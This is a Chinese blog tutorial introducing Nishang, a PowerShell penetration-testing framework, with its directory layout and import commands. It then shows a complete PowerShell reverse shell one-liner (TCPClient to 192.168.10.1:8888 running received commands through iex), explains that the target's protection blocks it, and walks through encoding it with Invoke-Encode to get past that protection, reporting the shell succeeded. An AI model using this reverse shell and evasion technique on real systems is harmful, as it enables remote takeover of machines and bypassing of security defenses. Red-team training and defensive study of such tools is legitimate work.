目录

Nishang

Nishang的目录结构

Nishang的使用

Invoke-Decode.ps1


Nishang

Nishang是一个PowerShell脚本和有效载荷的框架和集合,它使PowerShell能够用于攻击安全性、渗透测试和红队。它是基于PowerShell的渗透测试专用工具,集成了框架、脚本和各种Payload,包括下载和执行、键盘记录、DNS、延时命令等脚本,被广泛用于渗透测试的各个阶段。Nishang在PowerShell3.0及以上的环境中才能正常使用,所以Windows7、Server2008下默认是有点小问题的。项目地址:https://github.com/samratashok/nishang

Nishang的目录结构

  • ActiveDirectory:活动目录
  • Antak-WebShell:WebShell
  • Backdoors:后门
  • Bypass:绕过
  • Client:客户端
  • Escalation:提权
  • Execution:执行
  • Gather:信息收集
  • MITM:
  • Misc:发音
  • Pivot:跳板、远程执行exe
  • Prasadhak:Virustotal
  • Scan:扫描
  • Shells:shell
  • Utility:杂项
  • Powerpreter:Meterpreter会话

Nishang的使用

导入所有的脚本到当前的PowerShell会话中(PowerShell v3之前)

Import-Module -verbose  .\nishang.psm1

然后输入命令:Get-Command -Module nishang   查看nishang有哪些功能

Invoke-Decode.ps1

该脚本是Nishang的Utility目录下的,该脚本用于对payload进行编码。

例如,我们现在想利用powershell反弹shell。

我们在服务端使用powercat进行监听

我们在客户端的反弹shell的脚本如下,名为 reverse.ps1

$client = New-Object System.Net.Sockets.TCPClient('192.168.10.1',8888);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

但是由于客户端机器存在防护,直接指向该脚本反弹不了shell。所以,我们现在就利用 Invoke-Encode.ps1脚本对reverse.ps1进行编码。执行完成后,会生成两个文件:encoded.txt 和 encodedcommand.txt,前者是编码的数据,后者是编码后的命令。

  1. Import-Module .\Invoke-Encode.ps1
  2. Invoke-Encode -DataToEncode .\reverse.ps1 -OutCommand

我们复制encodedcommand.txt 里面的命令,在powershell中执行,可以看到,反弹shell成功。

未完待续。。

PowerShell渗透工具Nishang相关推荐

  1. Powershell 渗透测试工具-Nishang

    Powershell 渗透测试工具-Nishang 分享到: 作者:V1ct0r 稿费:500RMB(不服你也来投稿啊!) 投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿 传送门 ...

  2. arpspoof渗透工具使用方法详解+实战

    目录 Arp渗透工具 arpspoof 工作原理简介 安装及使用 流程演示 1.找到开发经理的IP地址及网关的地址 2.将自己变成成网关 开启转发功能后,测试网络搜索正常 开发经理的信息 2.解析抓取 ...

  3. 渗透工具-白帽安全工程师Kali linux系统

    渗透工具-白帽安全工程师Kali linux ubuntu 20.04 安装metasploit msfvenom常用生成 Payload 命令 2022 安装 Armitage 傻瓜渗透msf 介绍 ...

  4. 内网渗透工具Cobalt Strike 基础使用

    Cobalt Strike:C/S架构的商业渗透软件,适合多人进行团队协作,可模拟APT做模拟对抗,进行内网渗透. Cobalt Strike一款GUI的框架式渗透工具,集成了端口转发.服务扫描,自动 ...

  5. waf可以查看post请求吗_WAFNinja:一款绕过WAF的渗透工具

    0x00 前言 在我们平时做渗透测试的时候,难免会遇到各种WAF的阻挡.这时一款良好的绕过WAF的渗透测试工具就显得很受渗透测人员欢迎,在这里我们推荐一款绕过WAF的实用渗透工具,希望对大家平时做渗透 ...

  6. 【内网渗透工具】炫彩蛇安装教程

    点击查看[学习资料] Viper是一款图形化内网渗透工具,将内网渗透过程中常用的战术及技术进行模块化及武器化. Viper基础功能已集成杀软绕过,内网隧道,文件管理,增强命令行等基础功能. Viper ...

  7. 攻击者利用的Windows命令、横向渗透工具分析结果列表

    横向渗透工具分析结果列表 https://jpcertcc.github.io/ToolAnalysisResultSheet/ 攻击者利用的Windows命令 https://blogs.jpcer ...

  8. 铭说 | 内网渗透工具分析——reGeorg

    01 前言 通常情况下用户认为将数据和业务分离,只将业务A服务器对外开放,让数据服务器B不对外开放,那么即使用户的A服务器失陷,数据依然保存在内网中,不会被黑客直接访问.用户认为这种方式可以尽可能降低 ...

  9. 内网渗透-红队内网渗透工具(Viper)

    最近发现一款很强大的内网渗透工具Viper 接下来我给大家介绍一下具体的安装过程,这里我在kali上进行安装 (1)首先打开kali终端,切换到root用户,确认以下操作都在root用户下操作,sud ...

最新文章

  1. 联邦学习,为何而生?
  2. 给 Spring Boot 项目减减肥!18.18M 到 0.18M 是如何做到的?
  3. Javascript 中的 Function对象
  4. 秒杀系统必须考虑的 3 个技术问题!
  5. 打开高效文本编辑之门_Linux Awk自定义变量与操作符
  6. mysql 执行查询_MySQL查询的执行过程
  7. 对vue-tree-select的封装
  8. 跑动大数据的笔记本配置_大数据说话|你比一般跑者跑得更快吗?
  9. Nvidia League Player:来呀比到天荒地老
  10. CVE-2020-15999:Chrome FreeType 字体库堆溢出原理分析
  11. 对待小事情和整理资料------开会心得
  12. office 在线浏览和编辑 部署 Office Web Apps Server
  13. Eclipse的.properties文件输出中文成unicode编码
  14. 特斯拉为什么不用激光雷达和高精地图?
  15. VC 6.0下载 VC 6.0英文版下载 Visual C++ 6.0 英文企业版 集成SP6完美版(最新更新地址,百度网盘)...
  16. 2021 年 8 月程序员工资出炉啦!北京以18904元位居榜首
  17. 经纬度转GeoHash
  18. 微信公众号展示页面模板
  19. 不小心删了sxos文件夹_SXOS误升级11.0.1降级教程进入打开正版系统教程
  20. 移动端H5页面生成图片解决方案

热门文章

  1. 【Auto.js】为任何指定QQ好友点赞
  2. 计算某一段程序消耗的内存和时间【Java】
  3. 将表导入到其他用户的impdp命令
  4. 应届生程序员,业务和技术孰轻孰重,如何找到适合自己的方向
  5. linux平台下Tomcat的安装与优化
  6. MongoDB在Windows系统下的安装和启动
  7. 代码质量的几点新思考
  8. java-静态-单例-继承
  9. 基于Schema配置的AOP
  10. ExtJS4为form表单必填项添加红色*标识